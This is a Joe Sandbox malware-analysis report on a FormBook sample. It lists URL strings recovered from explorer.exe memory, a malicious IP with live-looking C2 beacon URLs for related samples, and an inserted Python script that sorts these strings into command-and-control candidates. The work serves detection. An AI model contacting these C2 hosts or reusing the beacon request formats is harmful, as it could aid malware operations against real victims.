                                                              http://www.layman.vip/cu29/www.nd-los.netexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.siabgc4d.online/cu29/www.48372305.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.apita.top/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.nd-los.netReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.layman.vip/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://outlook.comexplorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.inn-paaaa.buzzReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.azino-forum-pro.online/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.azino-forum-pro.onlineReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.layman.vipexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4008024188.000000000BCA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288001841.000000000BCA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077089186.000000000BCA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657529257.000000000BCA9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.68716329.xyz/cu29/www.apita.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.f6b-crxy.top/cu29/explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.oldsteps.buzzReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.azino-forum-pro.online/cu29/www.68716329.xyzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.yzq0n.top/cu29/www.siabgc4d.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000003.2285166751.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4005157734.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.srtio.xyzexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.leachlondonstore.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.nd-los.net/cu29/meexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.f6b-crxy.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.irex.info/cu29/www.yzq0n.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.microexplorer.exe, 00000006.00000002.4004189778.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4004218342.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4001297704.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
Memory-dump source sets referenced in the URL table (all from explorer.exe):
Set A: 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp
Set B: 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp
Set C: 00000006.00000003.2657529257.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000003.2288001841.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000003.3077089186.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000000.1554749905.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000002.4008024188.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp
Set D: 00000006.00000002.4002256173.0000000004405000.00000004.00000001.00020000.00000000.sdmp; 00000006.00000000.1545593009.0000000004405000.00000004.00000001.00020000.00000000.sdmp

URL | Source | Malicious | Antivirus detection | Reputation
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | Set A | false | | high
https://wns.windows.com/EM0 | Set C | false | | high
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt | Set A | false | | high
http://www.leachlondonstore.online/cu29/www.5mwhs.top | Set B | false | Avira URL Cloud: safe | unknown
http://www.68716329.xyz/cu29/ | Set B | false | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | Set A | false | | high
http://www.azino-forum-pro.online | Set B | false | Avira URL Cloud: safe | unknown
http://www.siabgc4d.onlineReferer: | Set B | false | Avira URL Cloud: safe | unknown
http://www.siabgc4d.online | Set B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it | Set A | false | | high
http://www.5mwhs.top | Set B | false | Avira URL Cloud: safe | unknown
http://www.irex.infoReferer: | Set B | false | Avira URL Cloud: safe | unknown
http://www.apita.top/cu29/www.oldsteps.buzz | Set B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | Set A | false | | high
http://www.48372305.top/cu29/www.77179ksuhr.top | Set B | false | Avira URL Cloud: safe | unknown
http://www.68716329.xyz | Set B | false | Avira URL Cloud: safe | unknown
http://www.oldsteps.buzz/cu29/www.srtio.xyz | Set B | false | Avira URL Cloud: safe | unknown
http://www.nd-los.net | Set B | false | | high
http://www.irex.info/cu29/ | Set B | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | Set A | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k | Set A | false | | high
http://www.77179ksuhr.topReferer: | Set B | false | Avira URL Cloud: safe | unknown
http://www.48372305.top/cu29/ | Set B | false | Avira URL Cloud: safe | unknown
http://www.77179ksuhr.top/cu29/www.f6b-crxy.top | Set B | false | Avira URL Cloud: safe | unknown
http://www.f6b-crxy.top/cu29/www.azino-forum-pro.online | Set B | false | Avira URL Cloud: safe | unknown
http://www.f6b-crxy.topReferer: | Set B | false | | high
http://www.77179ksuhr.top/cu29/ | Set B | false | Avira URL Cloud: safe | unknown
http://www.yzq0n.topReferer: | Set B | false | Avira URL Cloud: safe | unknown
http://ns.adobeS | Set D | false | | high
http://www.5mwhs.top/cu29/ | Set B | false | Avira URL Cloud: safe | unknown
http://www.srtio.xyzReferer: | Set B | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark | Set A | false | | high
http://www.inn-paaaa.buzz | Set B | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
85.13.166.18 | www.irex.info | Germany | 34788 | NMM-AS D-02742 Friedersdorf Hauptstrasse 68 DE | true
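Added example, not Joe Sandbox output or code: a small script that turns the URL strings recovered from explorer.exe memory (the Set B rows of the URL table) into a de-duplicated FormBook C2 candidate list. It assumes that the "/cu29/" path shared by those strings is this sample's C2 URI, that a string of the form "www.A/cu29/www.B" is two neighbouring entries of the in-memory domain list run together, and that a trailing "Referer:" is HTTP request-template text glued to the URL rather than part of the hostname. The URL strings and the single resolved IP (85.13.166.18 for www.irex.info) are copied from this report; the classification rules are the example's own.

```python
"""Extract FormBook C2 candidates from URL strings recovered from process memory."""
from urllib.parse import urlsplit

# URL strings copied from the report's explorer.exe memory-dump table (not constructed).
# The last three are benign strings from the same process, kept to show they are filtered out.
REPORT_URLS = [
    "http://www.leachlondonstore.online/cu29/www.5mwhs.top",
    "http://www.68716329.xyz/cu29/",
    "http://www.azino-forum-pro.online",
    "http://www.siabgc4d.onlineReferer:",
    "http://www.siabgc4d.online",
    "http://www.5mwhs.top",
    "http://www.irex.infoReferer:",
    "http://www.apita.top/cu29/www.oldsteps.buzz",
    "http://www.48372305.top/cu29/www.77179ksuhr.top",
    "http://www.68716329.xyz",
    "http://www.oldsteps.buzz/cu29/www.srtio.xyz",
    "http://www.nd-los.net",
    "http://www.irex.info/cu29/",
    "http://www.77179ksuhr.topReferer:",
    "http://www.48372305.top/cu29/",
    "http://www.77179ksuhr.top/cu29/www.f6b-crxy.top",
    "http://www.f6b-crxy.top/cu29/www.azino-forum-pro.online",
    "http://www.f6b-crxy.topReferer:",
    "http://www.77179ksuhr.top/cu29/",
    "http://www.yzq0n.topReferer:",
    "http://www.5mwhs.top/cu29/",
    "http://www.srtio.xyzReferer:",
    "http://www.inn-paaaa.buzz",
    "https://wns.windows.com/EM0",
    "https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew",
    "http://ns.adobeS",
]

C2_PATH = "/cu29/"      # assumption: the URI path shared by the suspicious strings is the C2 path
RESIDUE = "Referer:"    # assumption: request-template text glued to the URL in memory

# Copied from the report's IP table: the only domain that resolved, flagged malicious.
RESOLVED = {"www.irex.info": "85.13.166.18"}


def strip_residue(url: str) -> str:
    """Drop the 'Referer:' header text that follows a URL in the request buffer."""
    return url[: -len(RESIDUE)] if url.endswith(RESIDUE) else url


def parse_entry(url: str):
    """Return (host, path, glued_host); glued_host is B for strings like www.A/cu29/www.B."""
    parts = urlsplit(strip_residue(url))
    host, path, glued = parts.hostname or "", parts.path, None
    if path.startswith(C2_PATH):
        rest = path[len(C2_PATH):]
        if rest.startswith("www."):
            glued, path = rest, C2_PATH
    return host, path, glued


def c2_candidates(urls):
    """Hosts observed together with the C2 path, as request host or as glued neighbour."""
    hosts = set()
    for url in urls:
        host, path, glued = parse_entry(url)
        if path == C2_PATH:
            hosts.add(host)
            if glued:
                hosts.add(glued)
    return hosts


def unconfirmed_hosts(urls):
    """Heuristic: 'www.' hosts from the same strings that never appeared with the C2 path."""
    known = c2_candidates(urls)
    return {h for h, _, _ in map(parse_entry, urls) if h.startswith("www.") and h not in known}


def decoy_chain(urls):
    """Adjacency from glued strings: chain[A] == B means B followed A in the memory list."""
    chain = {}
    for url in urls:
        host, path, glued = parse_entry(url)
        if path == C2_PATH and glued:
            chain[host] = glued
    return chain


def resolved_candidates(urls, resolved=RESOLVED):
    """Candidates that actually resolved during the run, with the IP the report observed."""
    known = c2_candidates(urls)
    return {h: ip for h, ip in resolved.items() if h in known}


if __name__ == "__main__":
    for host in sorted(c2_candidates(REPORT_URLS)):
        print("candidate", host)
    for a, b in decoy_chain(REPORT_URLS).items():
        print("chain", a, "->", b)
    print("resolved", resolved_candidates(REPORT_URLS))
    print("unconfirmed", sorted(unconfirmed_hosts(REPORT_URLS)))
```

The classification is driven by the shared path and the glued-neighbour structure rather than by URL reputation: every one of these candidates is rated "safe" by the Avira URL Cloud lookup in the table, and only www.irex.info resolved during the run, so a reputation feed alone would have produced no indicator from this sample.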
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569252
Start date and time: 2024-12-05 16:48:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: JHnNxt6Pnb.exe (renamed because the original name is a hash value)
Original Sample Name: a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@525/6@11/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 105
• Number of non-executed functions: 337
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtEnumerateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: JHnNxt6Pnb.exe
Time | Type | Description
10:49:19 | API Interceptor | 2x Sleep call for process: JHnNxt6Pnb.exe modified
10:49:21 | API Interceptor | 26x Sleep call for process: powershell.exe modified
10:49:33 | API Interceptor | 6694860x Sleep call for process: explorer.exe modified
10:50:10 | API Interceptor | 6004509x Sleep call for process: ipconfig.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
85.13.166.18 | Statement of Account.exe | Get hash | malicious | FormBook | Browse | www.irex.info/cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT
85.13.166.18 | New PO 127429.exe | Get hash | malicious | FormBook | Browse | www.irex.info/cu29/?u6Zt=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgnCDylQV65J9tAeA==&kR-l=xP68RjTX
85.13.166.18 | Payment Reciept FL202306150003 Request 10273 Konturteile.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.irex.info/cu29/?lv1DT=Y2Jlpvjp8x-0AHv&iBZlUlWP=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNsnRT+mJF6v
85.13.166.18 | Request For PO-230102.bat.exe | Get hash | malicious | FormBook | Browse | www.irex.info/cu29/?Dzr=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZNgedySmeDm+J9tHNw==&R2M=Gpg8ENjxBfvTXZ1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.irex.info | Statement of Account.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
www.irex.info | New PO 127429.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
